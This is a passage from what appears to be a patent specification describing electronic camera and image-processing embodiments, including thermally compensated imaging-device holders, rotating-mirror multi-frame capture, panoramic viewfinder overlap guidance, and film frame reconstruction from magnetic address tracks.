Stated in another way, they are always in planes conjugate to that of the semitransparent mirror of the beam splitter 282. In the example of FIG. 83, the imaging devices 284a and 284b are moved not only along the axis of the optical system 287, but also in a line extending at right angles to the axis of the system 287. More precisely, the positions of the holder 286 and a holder 289, holding the second imaging device 284b and the first imaging device 284a, respectively, are reversed as compared to the first example (FIG. 82). Suppose that the holder 286 is heated and expands in the direction a, and the holder 289 holding the device 284a is also heated and its vertical and horizontal portions expand in the direction a and the direction b, respectively. As a result, the device 284b held by the holder 286 moves in the direction a, while the imaging device 284a held by the holder 289 moves in the direction b. If the displacement of the device 284a in the direction b is equal to that of the device 284b in the direction a, the relative positions of the devices 284a and 284b remain unchanged. As is clearly understood from the equation p×α = q×β, α>β. To keep the devices 284a and 284b at the same relative positions, a further equation must be satisfied, where r is the vertical distance between the base 281 and the axis of the imaging device 284b, and S is the horizontal distance between the axis of the imaging device 284a and the axis of the screw fastening the holder 289 to the base 281. As is evident from FIG. 83, r<S, and hence α>β. Therefore, only if r and S have values which satisfy the equation p×α = q×β do the two equations hold simultaneously. In other words, since the components take the positions specified in FIG. 83, not only the displacement of either imaging device along the axis of the optical system 287, but also the displacement thereof in a line extending at right angles to the axis of the system 287, is compensated. In either example it is possible to prevent changes in the relative positions of the imaging devices placed in planes conjugate to the semitransparent mirror of the beam splitter 282 merely by selecting two materials having different thermal expansion coefficients for the holders supporting the imaging devices 284a and 284b, respectively. Neither holder needs to be made of a material having a small thermal expansion coefficient, which is expensive and has low processibility. Assume that the materials of the holders have different thermal expansion coefficients which are known. Then, those portions of the holders to which the devices 284a and 284b are attached may have lengths determined in accordance with the known thermal expansion coefficients. In this case as well, the relative positions of the devices can be prevented from changing even if the holders experience temperature changes. According to the present invention, the components of the imaging section need not be made of materials having a very small thermal expansion coefficient to avoid changes in the relative positions of the imaging devices. Rather, they are made of materials having different, large thermal expansion coefficients. They can yet prevent changes in the relative positions of the imaging devices, because they have the sizes specified above and are located at the positions described above. An electronic camera, which is a twenty-fifth embodiment of the invention, will now be described with reference to FIGS. 84 and 85.
In the twenty-first embodiment shown in FIG. 67, the mirror 203a is arranged between the imaging lens system 202 and the imaging device 204 (i.e., the CCD). Hence, the wider the input image, the greater the aberration of the image, and the greater the reduction in ambient light. The twenty-fifth embodiment, or the electronic camera, is characterized in that, as shown in FIG. 84, a mirror 203a is provided between an object and an imaging lens system 202. The electronic camera comprises a CMD 204a having 2048×256 pixels which are arranged in rows and columns as is illustrated in FIG. 85. The CMD 204a has a clock pulse generator 204-1, a horizontal scanning circuit 204-2, and a vertical scanning circuit 204-3. It should be noted that the rows of pixels, each consisting of 2048 pixels, extend perpendicular to the plane of FIG. 85. The CMD 204a is of the XY-address read type. When the clock pulse generator 204-1 supplies read pulses to the horizontal scanning circuit 204-2 and the vertical scanning circuit 204-3, pixel signals are output from the signal terminal SIG. As FIG. 84 shows, the electronic camera further comprises a stroboscopic lamp 291, polarizing filters 292 and 293, a voice coil 290, a processing section 294, a shutter-release button 299, and a memory card 297. The lamp 291 emits flashing light to illuminate an object of photography. The polarizing filters 292 and 293 are positioned with their polarizing axes crossing at right angles. The voice coil 290 is used to rotate the mirror 203a. The processing section 294 processes the pixel signals output by the CMD 204a. The memory card 297 is connected to the section 294, for storing the image data produced by the CMD 204a. The processing section 294 has the structure shown in FIG. 86. It comprises an A/D converter 205, a digitizer 206, an image-synthesizing circuit 295, a data-compressing circuit 207, a data-writing circuit 296, and a controller 298. The A/D converter 205 converts the analog pixel signals supplied from the CMD 204a to digital pixel signals. The digitizer 206 converts the digital pixel signals to binary image signals. The circuit 295 combines the image signals into image data representing a single image. The circuit 207 compresses the image data by a specific method. The circuit 296 writes the compressed image data into the memory card 297. The controller 298 controls all other components of the processing section 294, the voice coil 290, and the stroboscopic lamp 291, every time it receives a signal generated when a photographer pushes the shutter-release button 299. The image-synthesizing circuit 295 comprises a frame memory A 217 and a shake-correcting circuit 218, both being identical to those described above. The electronic camera takes a picture of an object when the stroboscopic lamp 291 emits flashing light while the mirror 203a is rotating. FIG. 87A indicates the timing of driving the stroboscopic lamp 291. More precisely, FIG. 87A illustrates the timing at which the stroboscopic lamp 291 is driven, or the changes in the voltages the vertical scanning circuit 204-3 applies to the N vertical scanning lines. FIG. 87B shows part of the waveform of a voltage applied to the Nth vertical scanning line. As is evident from FIG. 87B, the voltage applied to each line is at the lowest level to expose the CMD 204a to light, at the intermediate level to read a pixel signal, and at the highest level to reset a pixel.
Since the exposure timing and the signal-reading timing differ from line to line, the stroboscopic lamp 291 is driven to emit flashing light during the vertical blanking period, during which all pixels of the CMD 204a are exposed to light. The operation of the electronic camera shown in FIGS. 84 to 86 will be explained. When the photographer pushes the shutter-release button 299, the voice coil 290 rotates the mirror 203a and the stroboscopic lamp 291 emits flashing light at the time shown in FIG. 87A. The light is applied to the object through the polarizing filter 292 and is reflected from the object. The reflected light is applied through the polarizing filter 293 to the mirror 203a. The mirror 203a reflects the light, which is applied to the CMD 204a through the imaging lens system 202. Due to the use of the polarizing filters 292 and 293, the light applied to the CMD 204a is free of specular reflection. The A/D converter 205 converts the pixel signals generated by the CMD 204a to digital signals. The digitizer 206 converts the digital signals to binary signals, which are input to the image-synthesizing circuit 295. The A/D converter 205 and the digitizer 206 repeat their functions a predetermined number of times, whereby the circuit 295 produces image data representing an image. The data-compressing circuit 207 compresses the image data. The image data compressed by the circuit 207 is written into the memory card 297. Upon applying flashing light 15 times to the object, the electronic camera can form an image of the object which has a high resolution of about 2000×3000 pixels. Since the mirror 203a is located between the object and the imaging lens system 202, the resultant image is free of aberration, and no reduction in the ambient light occurs. Further, the two polarizing filters 292 and 293 prevent specular reflection of the light emitted from the stroboscopic lamp 291. Since the period for which the lamp 291 emits a beam of light is extremely short, the camera shakes very little, if at all, during the exposure period. Hence, each frame image is not displaced with respect to the next one even though the mirror 203a continues to rotate, whereby the resultant image is sufficiently clear. Once the image data is written into the memory card 297, which is portable, the data can easily be transferred to a printer or a personal computer. Even if the mirror 203a is rotated at an uneven speed, the controller 298 need not control the voice coil 290 very precisely. This is because a shake-correcting circuit (not shown) detects the changes in the speed and compensates for these changes. An electronic camera, which is a twenty-sixth embodiment of the invention, will be described with reference to FIGS. 88 and 89 and FIGS. 90A and 90B. This embodiment is similar to the twenty-fifth embodiment shown in FIG. 84. The same components as those shown in FIG. 84 are denoted by the same reference numerals in FIG. 88, and only the characterizing features of the twenty-sixth embodiment will be described in detail. In the electronic camera of FIG. 84, the flashing light emitted from the stroboscopic lamp 291 illuminates not only the object but also the background thereof. In other words, the light is applied to areas outside the view field of the camera. This is a waste of light. The electronic camera shown in FIG. 88 is designed to save light. To be more specific, a reflector 300 and a lens system 301 converge the flashing light from a stroboscopic lamp 291, producing a converged light beam.
The light beam is applied to a half mirror 302 and hence to a mirror 203a. The mirror 203a reflects the light beam to the object. The light reflected from the object is applied to the mirror 203a. The mirror 203a reflects the beam, which is applied to a CMD 204a through the half mirror 302 and an imaging lens system 202. Thus, the light is applied to the object, not being wasted. The half mirror 302 has a polarizing plate and can, therefore, remove specularly reflected components from the light reflected from the object. In the case where the stroboscopic lamp 291 cannot be used, the mirror 203a may be intermittently rotated with such timing as is illustrated in FIG. 89. If the mirror 203a is rotated at one-frame intervals, however, the image data items representing frame images may mix together. In the present embodiment, the mirror 203a is rotated at two-frame intervals (or longer intervals) so that only the signals the CMD 204a generates during each exposure period A may be supplied to the image-synthesizing circuit (not shown) incorporated in a processing section 294. The signals the CMD 204a produces during each exposure period B are not used at all. Another electronic camera, which is a twenty-seventh embodiment of the invention, will be described with reference to FIGS. 90A and 90B. This camera is characterized in that, as shown in FIG. 90A, a spring 303, a cam 304a, and a connecting rod 304b work in concert, rotating a mirror 203b intermittently. Alternatively, as shown in FIG. 90B, a gear 312a and a screw 312b in mesh with the gear 312a may be used for intermittently rotating the mirror 203b. In this case, a FIT (Frame Interline Transfer)-type CCD 204b is used instead of the CMD 204a. The screw 312b has a helical groove, each turn of which consists of a flat part and a driven part. As the screw 312b rotates at a constant speed, the gear 312a is periodically rotated and stopped. The FIT-type CCD 204b has its even-numbered field and its odd-numbered field exposed substantially at the same time. The time during which to expose either field can be changed. FIG. 90C is a chart representing the timing at which exposure is performed, and the angle by which the mirror 203b is rotated, in the case where the mirror-driving mechanism shown in FIG. 90B is employed. As long as the gear 312a stays in mesh with any flat part of the helical groove of the screw 312b, the mirror 203b remains stationary for some time (e.g., 10 ms). It is during this time that both the even-numbered field and the odd-numbered field are exposed to light. While the gear 312a stays in engagement with any driven part of the helical groove, the mirror 203b rotates for some time (e.g., 20 ms). During this time the signals produced by the exposure of the fields are supplied to a processing section 224. The gear 312a and the screw 312b easily transform the rotation of the shaft of a motor into the intermittent rotation of the mirror 203b. The mirror-driving mechanism of FIG. 90B makes less noise than the mechanism of FIG. 90A, which comprises the cam 304a. By virtue of the mechanism shown in FIG. 90B, the frame-image data items are readily prevented from mixing together, and the illumination light is not wasted. The imaging device incorporated in the electronic camera of FIG. 90B is the FIT-type CCD 204b. The CCD 204b can be replaced by a CMD, provided that the mirror 203b is rotated at two-frame intervals or longer intervals.
An image processing apparatus according to a twenty-eighth embodiment of this invention will be described with reference to FIG. 91. This embodiment is characterized in that a TV camera is rotated to take frame images of an object, whereas the mirror 203b is intermittently rotated for the same purpose in the twenty-seventh embodiment (FIGS. 90A, 90B, and 90C). In the twenty-eighth embodiment, too, the frame images are combined into a single image. As FIG. 91 shows, the apparatus comprises a TV camera 305 such as a CCD camera, a processing section 294' which performs the same function as the section 294 shown in FIG. 84, a recording medium 306 such as a hard disk, a CRT monitor 221, and a printer 222. The section 294' comprises an A/D converter 205, an image-synthesizing circuit 295, a memory 219, and a D/A converter 220. This apparatus is designed to form a gray-scale image, and the image signals output by the TV camera 305 are not converted to binary ones. Another image processing apparatus, which is a twenty-ninth embodiment of the invention, will be described with reference to FIGS. 92, 93, and 94, FIGS. 95A and 95B, and FIG. 96. As can be understood from FIG. 92, this apparatus is similar to the apparatus of FIG. 91 and characterized in that an ultrasonic diagnosis apparatus 307 is used in place of the TV camera 305. The diagnosis apparatus 307 produces a convex-type ultrasonic image. This image consists of a trapezoidal image of an object and background, as is illustrated in FIG. 94. The background, which is an ineffective region containing data such as text, must not be used in synthesizing images. More precisely, that portion of the left image which overlaps the ineffective region of the right image, as is shown in FIG. 95A, is not used in image synthesis. That portion of the right image which overlaps the ineffective region of the left image is not used in image synthesis, either. The left and right images are combined by processing the pixel signals defining the overlap regions of the images as is illustrated in FIG. 96, that is, in the same way as in the first embodiment. FIG. 93 shows the imaging section of the twenty-ninth embodiment. The output of a memory A 217 is connected to a distance calculator 218a and an image-moving circuit 218b. The image-moving circuit 218b is connected to an edge-emphasizing circuit 308 designed for effecting edge-emphasis on signals deteriorated due to interpolation. The circuit 308 is connected to a left-border detector 309 for detecting the left border of the right image, and also to an image-synthesizing circuit 311. The left-border detector 309 and a memory B 219 are connected to the image-synthesizing circuit 311. The memory A 217 stores image data representing the left image, whereas the memory B 219 stores image data representing the right image. The image-synthesizing circuit 311 writes two image data items into the memory B 219. The first data item represents that part of the left image which is on the left of the left border of the right image. The second data item represents that part of the right image which is on the right of the right border of the left image. The circuit 311 processes the pixel signals defining the overlap regions of the left and right images, and writes the processed signals into the memory B 219. The imaging section can therefore combine convex-type ultrasonic images appropriately. An electronic camera, which is a thirtieth embodiment of the invention, will be described with reference to FIGS. 97A, 97B, and 97C and FIGS. 98 to 101.
This camera is designed to take three images of an object which overlap one another as shown in FIG. 97A, and to combine the images into a panoramic image. To be more specific, each image is taken when its left edge, seen in the field of the view finder, adjoins the right edge of the image taken previously and displayed in the field of the view finder. As shown in FIG. 97B, the field of the view finder comprises displaying sections A and B. The section A is provided to display a right edge portion of the first image previously taken. The section B is used to display the second image, which adjoins the right edge portion of the first image displayed in the section A. In order to photograph the image 2 shown in FIG. 97A after the image 1 shown in FIG. 97A has been taken, a photographer pans the camera until the left edge of the second image adjoins that part of the first image which is shown in the section A. Seeing the left edge of the second image adjoining said part of the first image displayed in the section A, the photographer pushes the shutter-release button, photographing the image 2. The imaging section of the thirtieth embodiment will be described in detail, with reference to FIG. 97C. The imaging section comprises a lens 321 for focusing an input optical image, a CCD 322 for converting the image into electric image signals, a preamplifier 323 for amplifying the image signals, a signal processor 324 for performing γ correction or the like on the image signals, an A/D converter 325 for converting the signals to digital image signals, and a color separator 326 for separating each digital signal into a luminance signal Y and chrominance signals Cr and Cb. As FIG. 97C shows, an image-adding section 327 is connected to the output of the color separator 326 to receive the luminance signal Y. Also, a data compressor 328 is connected to the output of the color separator 326 to receive the luminance signal Y and the chrominance signals Cr and Cb and compress data formed of these input signals. The image-adding section 327 comprises an overlap region memory 329, multipliers 330 and 331, a coefficient-setting circuit 332, and an adder 333. The memory 329 is provided for storing the image data representing an image previously photographed. The coefficient-setting circuit 332 is designed to produce coefficients C1 and C2 to supply to the multipliers 330 and 331, respectively. In operation, a luminance signal Y is supplied to the image-adding section 327. The section 327 adds part of the image data stored in the memory 329 to the luminance signal Y. The resultant sum is supplied from the image-adding section 327 to a D/A converter 334. The coefficients C1 and C2 are "1" and "0," respectively, for the displaying section A (FIG. 97B), and are "0" and "1," respectively, for the displaying section B (FIG. 97B). The output of the D/A converter 334 is connected to a view finder 335. The view finder 335 comprises a liquid-crystal display (LCD) 336 and an ocular lens 337. The data compressor 328 compresses the input signals Y, Cr, and Cb. The compressed signals are written into a memory card 339 when the photographer pushes a shutter-release button 338. The memory card 339 can be removed from the electronic camera. The shutter-release button 338 is a two-step switch. When the button 338 is depressed to the first depth, the camera measures the distance between itself and the object and also the intensity of the input light.
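The finder composition performed by the image-adding section 327 reduces to a weighted sum per displaying section. The following is a minimal sketch of that sum; the function name and sample values are illustrative, not from the patent.

```python
# Hedged sketch of the image-adding section 327: the finder output is
# C1 * (stored overlap image) + C2 * (live image). C1=1, C2=0 shows the
# stored right edge of image 1 in section A; C1=0, C2=1 shows the live
# image in section B.
def finder_pixel(stored, live, c1, c2):
    return c1 * stored + c2 * live

pixel_a = finder_pixel(stored=180, live=90, c1=1, c2=0)  # section A -> 180
pixel_b = finder_pixel(stored=180, live=90, c1=0, c2=1)  # section B -> 90
```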
When the button 338 is pushed to the second depth, the camera photographs the object. A controller 340 is connected to the image-adding section 327 and also to the memory card 339, for controlling the section 327 and for controlling the supply of write addresses to the memory card 339. The operation of the electronic camera according to the thirtieth embodiment of the invention will now be explained. First, the photographer holds the camera at such a position that the left edge of an object is placed at the center of the field of the view finder 335. He or she then pushes the shutter-release button 338 to the first depth. The distance-measuring system and the photometer system (neither shown) operate to adjust the focal distance and the exposure time. The CCD 322 converts the first optical image 1 into image signals, which are amplified by the preamplifier 323. The signal processor 324 effects γ correction or the like on the amplified image signals. The A/D converter 325 converts the output signals of the processor 324 to digital signals. The color separator 326 separates each digital image signal into a luminance signal Y and chrominance signals Cr and Cb. The signals Y, Cr, and Cb are input to the data compressor 328. When the photographer further pushes the shutter-release button 338 to the second depth, the data compressor 328 compresses the image data representing the first image 1, and the compressed image data is written into the memory card 339 and stored in a prescribed storage area thereof. In the meantime, the image data representing the right part of the image 1 (i.e., the overlap region 1 shown in FIG. 97A) is stored into the overlap region memory 329. The adder 333 adds this image data to the image data representing the second image 2, generating combined image data. The D/A converter 334 converts the combined image data to analog image data, which is supplied to the LCD 336. The LCD 336 displays the image shown in FIG. 97B. As FIG. 97B shows, displayed in the region A is the right edge of the image 1, which is represented by the image data stored in the overlap region memory 329; displayed in the region B is the second image 2, which is focused on the CCD 322 at present. The left edge of the image 2, which overlaps the right edge of the image 1, cannot be seen in the field of the view finder 335. The camera is then panned until the position where the images 1 and 2 properly adjoin each other appears in the field of the view finder 335. The photographer depresses the shutter-release button 338 completely, or to the second depth, upon judging that the images 1 and 2 are connected appropriately. The image data of the image 2 now focused on the CCD 322 is thereby written in a prescribed storage area of the memory card 339. Simultaneously, the right edge of the image 2, i.e., the overlap region 2 overlapping the third image 3, is written in the overlap region memory 329. Thereafter, the third image 3 is photographed in the same way as the first image 1 and the second image 2. As a result, the three frame images 1, 2, and 3 are formed. Their overlap regions 1 and 2 (FIG. 97A) may be displaced from the desirable positions. Such displacement can be compensated by the image synthesis to be described later. The photographer need not pan the camera with so much care as to place the overlap region 1 or 2 at a desired position, and can therefore take many pictures within a short time. The images 1, 2, and 3 taken by the electronic camera shown in FIG.
97C are reproduced from the memory card 339 by the image-reproducing apparatus shown in FIG. 98. The image-reproducing apparatus comprises a data expander 341 for expanding the image data items read from the memory card 339, an image-synthesizing circuit 342 for combining the expanded data items, a controller 343 for controlling the read address of the card 339 and the image-synthesizing circuit 342, a filing device 344 for storing synthesized images, a monitor 345 for displaying the synthesized images, and a printer 346 for printing the synthesized images. The image-synthesizing circuit 342 has the structure shown in FIG. 99. It comprises three frame memories 351, 352, and 353, displacement detectors 354 and 355, interpolation circuits 356 and 357, an image-synthesizing section 358, and a frame memory 364. The frame memories 351, 352, and 353 store the data items representing the images 1, 2, and 3, respectively. The displacement detectors 354 and 355 detect the displacements of the overlap regions 1 and 2 from the image data items read from the frame memories 351, 352, and 353. The detector 354 calculates the parallel displacement S1 and rotation angle R1 of the second image 2 with respect to the first image 1. Similarly, the detector 355 calculates the parallel displacement S2 and rotation angle R2 of the third image 3 with respect to the second image 2. The displacement S1 and the angle R1 are input to the interpolation circuit 356, and the displacement S2 and the angle R2 to the interpolation circuit 357. The interpolation circuit 356 interpolates the pixel signals read from the second frame memory 352 and representing the second image 2, thereby producing a data item showing an image appropriately adjoining the first image 1. The interpolation circuit 357 interpolates the pixel signals read from the third frame memory 353 and representing the third image 3, thereby producing a data item representing an image properly adjoining the second image 2. The image data items produced by the circuits 356 and 357 are input to the image-synthesizing section 358. As shown in FIG. 99, the image-synthesizing section 358 comprises multipliers 359, 360, and 361, a coefficient-setting circuit 362, and an adder 363. The circuit 362 is designed to produce coefficients a, b, and c for the images 1, 2, and 3, respectively. The coefficients a, b, and c change linearly in the overlap regions 1 and 2, as is illustrated in FIG. 100. The image-synthesizing section 358 calculates values for the pixel signals defining the image which the image-synthesizing circuit 342 is to output. These values are stored, in the form of image data, into the frame memory 364. The image data representing the combined image is read from the frame memory 364 and supplied to the filing device 344, the monitor 345, and the printer 346, all incorporated in the image-reproducing apparatus shown in FIG. 98. Hence, the synthesized panoramic image is recorded by the filing device 344, displayed on the monitor 345, and printed by the printer 346. The image-reproducing apparatus, which combines the frame images produced by the electronic camera (FIG. 97C), may be built into the electronic camera. In the thirtieth embodiment, only the right edge of the image previously taken is displayed in the section A of the view-finder field, while the image being taken is displayed in the section B of the view-finder field. Instead, both images may be displayed such that they overlap in the display section A.
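The linearly changing coefficients of FIG. 100 amount to a cross-fade across each overlap region, which hides the seam between adjacent images. Below is a minimal sketch of that blending; the strip shapes and names are illustrative assumptions.

```python
# Hedged sketch of the linear blending suggested by FIG. 100: inside an
# overlap region the weight of the left image ramps from 1 down to 0 while
# the weight of the right image ramps from 0 up to 1.
import numpy as np

def blend_overlap(left_strip, right_strip):
    """Cross-fade two equally sized overlap strips along their width."""
    h, w = left_strip.shape
    ramp = np.linspace(0.0, 1.0, w)            # 0 at left edge, 1 at right edge
    a = 1.0 - ramp                             # coefficient for the left image
    b = ramp                                   # coefficient for the right image
    return left_strip * a + right_strip * b    # broadcasts across all rows
```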
To display the images overlapped in this way, it suffices for the photographer to operate the coefficient-setting circuit 362, thereby setting the coefficients C1 and C2 at 0.5 for the display section A and at 1 and 0, respectively, for the display section B, and to pan the camera such that the second image overlaps, in part, the first image displayed in the section B. Thus, the photographer can take images overlapping in a desired manner, at high speed.

The signals supplied to the LCD 336 are exclusively luminance signals Y, and the images the LCD 336 can display are monochromic. Nonetheless, the LCD 336 may be replaced by a color LCD. The color LCD, if used, may display the two images in different colors so that they may be distinguished more clearly than otherwise. Further, the image signals read from the overlap region memory 329 may be input to an HPF (High-Pass Filter) 365 and be thereby subjected to high-pass filtering, such as a Laplacian operation, as is illustrated in FIG. 101; with the edges thus emphasized, the two frame images can be more easily overlapped in a desired manner.

As has been described, the thirtieth embodiment is designed to take three frame images by panning the camera and to combine them into a panoramic image. Instead, four or more frame images may be combined into a single wider image.

Still another electronic camera, which is a thirty-first embodiment of this invention, will now be described with reference to FIGS. 102 and 103. This electronic camera is similar to the camera (FIG. 97C) according to the thirtieth embodiment of the invention. Hence, the same components as those shown in FIG. 97C are designated by the same reference numerals in FIG. 102 and will not be described in detail.

The camera shown in FIG. 102 is characterized in three respects. First, a correlator 371 is used which finds the correlation between the image data read from the overlap region memory 329 and the data representing the image being taken, to calculate the displacement of the image with respect to the image previously taken. Second, an arrow indicator 372 is incorporated in the view finder 335, for indicating the displacement calculated by the correlator 371. Third, an audio output device 373 is incorporated to generate a sound or a speech informing the photographer of the direction in which the camera should be moved.

The arrow indicator 372 displays an arrow in the field of the view finder 335. The arrow may extend upwards, downwards, to the left, or to the right, indicating how much the image is displaced, and in which direction, with respect to the image previously taken, as FIG. 103 shows. The indicator 372 has a light source 374 which emits red light and blue light.

If the correlation the correlator 371 has calculated has a very small value (indicating that the two frame images do not overlap), the light source 374 emits red light. In the case where the correlation has been correctly detected, determining the displacement of the second image with respect to the first, the indicator 372 displays an arrow extending in the direction in which the first image is displaced. The camera is moved to bring the second image to a position where it properly overlaps the first image, thus reducing the displacement to substantially zero. At this time, the light source 374 emits blue light.

Not only is an arrow displayed in the field of the view finder 335, but the audio output device 373 also gives forth an audio message, such as "Pan the camera to the right!" or "Pan the camera to the left!", instructing the photographer to pan the camera in that direction.
If the displacement is large, the device 373 may generate a message "Pan the camera much to the left!" or a message "Pan the camera a little to the right." Alternatively, the arrow indicator 372 may display a blinking arrow indicating that the second image is displaced excessively.

A thirty-second embodiment of the present invention will be described with reference to FIGS. 104A and 104B. In this embodiment, nine frame images overlapping one another as shown in FIG. 104A are combined into a large single image. The numerals shown in FIG. 104A indicate the order in which the images are photographed. To take the image 5, a photographer moves the camera so that the LCD of the view finder displays the images 2, 4, and 5 at such positions as are shown in FIG. 104B. When the upper and right edges of the image 5 appropriately overlap the lower edge of the image 2 and the left edge of the image 4, respectively, the photographer depresses the shutter-release button, thereby taking the image 5.

Since the LCD displays not only a frame image located on the left or right side of the target image, but also a frame located above or below the target image, it is possible with the thirty-second embodiment to photograph many frame images arranged in both the horizontal direction and the vertical direction, overlapping one another. To achieve this multi-image photographing, the imaging section (not shown) of this embodiment needs an overlap region memory which has a greater storage capacity than the overlap region memory 329 used in the thirtieth embodiment (FIG. 97C).

An image processing apparatus according to a thirty-third embodiment of the invention will be described, with reference to FIGS. 105A and 105B. This embodiment is a data-reading apparatus for reading data from a flat original. As is shown in FIG. 105A, the imaging section 375 of the apparatus is attached to a stay 374 protruding upwards from a base 376 and is located above the base 376. A shutter-release button 377 is mounted on the base 376. When the button 377 is pushed, the imaging section 375 photographs an original placed on the base 376. The imaging section 375 has a view finder 378. A memory card 379 is removably inserted into the imaging section 375.

A photographer does not move the imaging section 375 as in the thirtieth embodiment. Rather, he or she moves the original on the base 376 and takes frame images of the original. The photographer pushes the shutter-release button when he or she sees that the target part of the original is displayed in the field of the view finder 378.

An XY stage 380 may be mounted on the base 376, as is illustrated in FIG. 105B, and the original may be placed on the XY stage 380. In this case, the stage 380 can be automatically moved along the X axis and the Y axis in accordance with the displacement, calculated by the correlator 371, of the frame image being taken with respect to the frame image previously taken. In other words, the photographer need not move the original to locate the image of the desired part of the original in the field of the view finder 378. Alternatively, a drive mechanism (not shown) may drive the stay 374 along the X axis and the Y axis in accordance with the displacement which the correlator 371 has calculated.

To identify each image taken, a numeral or any ID mark may be superimposed on the image.
Further, it is possible for the photographer to operate a switch on the imaging section 375, displaying, in the view-finder field, all frame images taken thus far of an original, so that he or she may recognize what a single combined image would look like. Still further, the CCD incorporated in the imaging section 375 may be replaced by a line sensor.

Another image processing apparatus, which is a thirty-fourth embodiment of this invention, will be described with reference to FIGS. 106 to 108 and FIGS. 109A to 109C. This embodiment is a modification of the film-editing apparatus shown in FIG. 63, which uses photographic film.

The film-editing apparatus shown in FIG. 106 uses a special type of photographic film 401. As FIG. 107 shows, the film 401 has a series of imaging areas 425 and two series of magnetic tracks 426 extending along the perforations, or along the edges of the imaging areas 425. An address signal of the type shown in FIG. 108, consisting of 0s and 1s, is recorded on each magnetic track 426. In this embodiment, the image formed in each imaging area 425 of the film 401 is divided into three images 425a, 425b, and 425c, as is shown in FIGS. 109A, 109B, and 109C. These images 425a, 425b, and 425c will be detected by an imaging device (later described).

As can be understood from FIG. 106, a controller 33 controls a motor controller 407, which in turn drives an electric motor 402. The motor 402 rotates the film take-up shaft, whereby the film 401 loaded in a film-feeding mechanism 431 is taken up around the take-up shaft. Two magnetic heads 427a and 427b are in contact with the film 401 to read the address signals from the magnetic tracks 426 of the film 401. A light source 403 is located near the film 401, for applying image-reading light to the film 401.

The optical image read from each imaging area 425 of the film 401 is focused on a CMD 405a, i.e., a solid-state imaging device, by means of an optical system 404. (The CMD 405a is used since it can be shaped relatively freely.) The CMD 405a converts the input optical image into image signals, which are amplified by a preamplifier 10. An A/D converter 14 converts the amplified signals to digital signals, which are input to a signal processor (SP) 20. The signal processor 20 generates three data items representing the images 425a, 425b, and 425c, respectively. These image data items are stored into frame memories 22a, 22b, and 22c, respectively. A low-pass filter (LPF) may be connected between the preamplifier 10 and the A/D converter 14, for removing noise components from the amplified image signals. Further, an FPN (Fixed Pattern Noise)-removing circuit may be incorporated in the CMD 405a.

Meanwhile, the address signals read by the magnetic heads 427a and 427b are supplied to counters 428 and 429, which count these signals. When the count of either counter reaches a predetermined value, the controller 33 causes the motor controller 407 to stop the motor 402, terminating the take-up of the film 401. The count values of both counters 428 and 429 are input to a displacement-determining circuit 430. The circuit 430 determines the displacement of the film with respect to a prescribed position, from the count values the counters 428 and 429 have when the film take-up is stopped. The displacement is defined by a rotation angle R and a parallel displacement S, which are calculated by the same method as has been explained in connection with the first embodiment of the present invention.
The controller 33 controls the frame memories 22a, 22b, and 22c, reading the image data items therefrom to an image-synthesizing circuit 408. The circuit 408 combines the input image data items in accordance with the rotation angle R and the parallel displacement S which have been detected by the displacement-determining circuit 430. As a result, the image recorded in each imaging area 425 of the film 401 is reconstructed in the same way as has been explained in conjunction with the first embodiment of the invention. The image data representing the image reconstructed by the circuit 408 is input to a display 409, a data storage 410, or a printer 411.

It will now be explained how the film-editing apparatus of FIG. 106 performs its function. First, the film 401 is loaded into the film-feeding mechanism 431 and is taken up around the take-up shaft. In the process, the counters 428 and 429 count the address signals the magnetic heads 427a and 427b read from the magnetic tracks 426. When the count of either counter reaches the predetermined value, the film-feeding mechanism 431 is stopped, and the magnetic heads 427a and 427b have moved relative to the film 401 to position B when the film 401 is stopped, as is shown in FIG. 109A.

Next, the light source 403 applies light to the film 401, reading a first part of the image recorded in the imaging area 425 of the film 401. The optical system 404 focuses the image, thus read, on the CMD 405a. The CMD 405a converts the input optical image into image signals, which are processed by the preamplifier 10, the A/D converter 14, and the signal processor 20 into an image data item representing the first part of the image. This image data item is written into the frame memory 22a.

Thereafter, the magnetic heads 427a and 427b move relative to the film 401 to position C, where the film 401 is stopped, and then the heads 427a and 427b move relative to the film 401 to position D, as is illustrated in FIG. 109B. The light source 403, the optical system 404, the CMD 405a, the preamplifier 10, the A/D converter 14, and the signal processor 20 operate in the same way as described in the preceding paragraph. As a result, two image data items representing the second and third parts of the image are stored into the frame memories 22b and 22c, respectively.

Next, the three data items are read from the frame memories 22a, 22b, and 22c and supplied to the image-synthesizing circuit 408. The circuit 408 combines the input data items, thus reconstructing the image recorded in the imaging area 425 of the film 401, in accordance with the displacement data items (each consisting of R and S) produced by the displacement-determining circuit 430.

The three parts of the image shown in FIG. 109B are those which would be read from the film 401 if the film 401 stopped at the desired positions. In practice, the parts of the image assume positions B', C', and D' shown in FIG. 109C, displaced with respect to one another. This is inevitable because the film 401 cannot stop at the desired positions, owing to the inertia of the film-feeding mechanism 431.

If any image part assumes an undesirable position when the film 401 is stopped, the actual count of each counter is either greater or less than the predetermined value. The difference in count is equivalent to a motion vector detected and utilized in any embodiment described above that incorporates a correlator or correlators.
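How a count difference translates into R and S is not spelled out here, but the geometry suggests one plausible reading: if the two heads ride tracks near opposite film edges, each address pulse corresponds to a fixed film advance, and the two tracks are a known distance apart, then the mean count error gives the parallel displacement and the differential error gives the skew angle. The C sketch below is a hedged reconstruction along those lines; the pulse pitch, track gap, and function name are our assumptions, not the patent's.

```c
#include <math.h>

/* Hedged reconstruction: derive the parallel displacement S (mm) and the
 * rotation angle R (radians) of a stopped film frame from the counter
 * errors of the two magnetic heads. `expected` is the predetermined count,
 * pitch_mm the film advance per address pulse, gap_mm the track separation. */
static void count_error_to_displacement(long count_a, long count_b,
                                        long expected, double pitch_mm,
                                        double gap_mm, double *S, double *R)
{
    double err_a = (count_a - expected) * pitch_mm;  /* overshoot, edge A */
    double err_b = (count_b - expected) * pitch_mm;  /* overshoot, edge B */
    *S = 0.5 * (err_a + err_b);          /* common part: translation */
    *R = atan2(err_a - err_b, gap_mm);   /* differential part: skew  */
}
```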
The displacement-determining circuit 430 can accurately calculate the rotation angle R and the parallel displacement S from that difference in count, and the image-synthesizing circuit 408 can combine the image parts with high precision. Because address signals are recorded on the photographic film 401, the circuit 430 can accurately calculate the displacements of image parts even if the image parts have low contrast, which a correlator cannot do. Supplied with the displacement calculated by the displacement-determining circuit 430, the image-synthesizing circuit 408 can reconstruct a high-resolution image from the image data output by the CMD 405a, though the CMD 405a is a relatively small solid-state imaging device. Nonetheless, the displacement-determining circuit 430 may be replaced by a correlator. In this case, the correlator calculates the motion vector from the positions which the perforations of the film 401 assume relative to the CMD 405a.

